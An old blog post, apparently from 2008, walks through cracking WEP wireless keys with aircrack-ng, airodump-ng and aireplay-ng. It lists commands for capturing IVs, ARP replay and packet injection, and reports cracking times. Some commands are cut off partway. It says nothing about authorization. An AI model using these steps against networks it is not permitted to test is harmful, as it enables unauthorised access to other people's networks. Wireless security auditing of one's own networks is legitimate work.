26oct08
airodump is quite similar to aircrack-ng. You can find a very good tutorial on the aircrack-ng homepage. For airodump you need to make some little changes.
* In Step 3, you MUST NOT use the parameter -ivs. Just skip this parameter, the other command line
arguments still apply.
* In Step 5, you should use aircrack-ptw instead of aircrack-ng. ls -la output*.cap will give you a
list of capture files airodump-ng has created. Usually, if you did not interrupt airodump-ng, there should be only one file named output-01.cap. Just start aircrack-ptw output-01.cap to get the key. If aircrack-ptw was not successfull, wait a few seconds and start it again.
Please make sure that you got the libpcap developement files installed. On debian or ubuntu, you can do this with apt-get install libpcap0.8-dev.
aircrack-ng is a set of tools for auditing wireless networks. It's an enhanced/reborn version of aircrack. It consists of airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), airdecap (decrypts WEP/WPA capture files), and some tools to handle capture files (merge, convert, etc.).
http://www.aircrack-ng.org - Version: 0.5 April 2006 airodump-ng
Term 1 - Capture IVs in the traffic
airodump-ng -w out -c 8 --ivs ath0
*
-w out: our output filenames start with the prefix "out"
*
-c 8: only look at channel #8 (2.447ghz)
*
-ivs: collect only the IVs, not the entire packets
*
ath0: network capture interface, should be reported by ifconfig/iwconfig
*
Can verify BSSID, Channel, Encryption, ESSID when inteface comes up
o
also outputted to "out-1.txt" file, very handy reference for info below
*
We want about 100k packets to be recorded under "# Data" menu
aircrack-ng
Term 2 - Try to crack the key based on IVs
aircrack-ng -a 1 -b
*
-a 1: force cracking WEP mode (2 for WPA)
*
-b AP_MAC: the MAC address the AP
*
-n 64: WEP key length of 64
*
out-1.ivs: the output file of IVS generated from airodump-ng
The new aircrack-ng incorporates the Korek statistical attacks on WEP to generally greatly reduce the number of IVs required before cracking the key. Due to the statistical nature of the attack though, aircrack may on occasion fail to find the key, and thus you may try adjusting some of these options (from the manpage):
*
-f <fudge>
o
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level:
cracking will take more time, but with a higher likelihood of success.
*
-k <korek>
o
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents
the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
aireplay-ng
Term 3 - Generate more traffic, get more IVs, speed up cracking ARP Attack
This attack will require some clients already associated to the AP/router (wired or wireless). Once an ARP request is seen, aireplay-ng will "replay" that ARP request (repeatedly) and thus triggering many ARP replies, in turn - each with a new unique IV. This will rapidly increase the number of IVs that airodump records and will assist aircrack in cracking the WEP key.
The CLIENT_MAC must be the system that sends the ARP request, and thus it may be necessary to "initialize this attack" by sending a ping request from the CLIENT_MAC machine to the AP? or another wireless client on the network. Once this happens, aireplay should start rapidly recording more ARP requests to verify that the attack is working as well as airodump should have a rapidly increasing count of the number of "Data" (IV) packets captured.
Note: The out-1.txt file from airodump can be referenced for the required MAC addresses.
aireplay-ng -3 -b
*
-3: ARP replay attack
*
-b <AP_MAC>: supply the MAC address of the AP
*
-h <CLIENT_MAC>: supply the MAC address of a wireless client
*
ath0: interface to use
Pkt Injection
aireplay-ng -2 -b
*
after reading about 10k packets, will prompt for a response: "Use this packet?"
*
Then proceeds the injection attack
o
CLIENT_MAC should be on the network, an actual client to the AP to get more pkts
Results
The below sample results were obtained while running aircrack, aireplay and airodump simultaneously. In this manner, aircrack attempts to crack the key based on all IV's airodump has currently collected to its output file. If aircrack is run offline with an output file of IVs (of sufficient length) pre-recorded by airodump, then aircrack is able to crack the key generally within seconds. With all three applications running at the same time, aircrack runs significantly slower. Some example timing results include (but Your Mileage May Vary):
*
crack 64 bit with "aireplay -3": 41 min
*
crack 64 bit with "aireplay -2": 03 min
*
crack 128 bit with "aireplay -2": 15 min
*
crack 128 bit with "aireplay -3": 19 min
*
crack 'strong password' 128 bit key with "aireplay -2": 2 hrs 38 min
o
'strong password' random ASCII text used from: https://www.grc.com/passwords
o
Note: More testing and research may be required to verify if this final test is an anomaly unaffected
by the Korek attacks possibly, there may be weaknesses in the PRNG of the WEP keys based on a passphrase, or just by sheer chance this key just took longer to crack.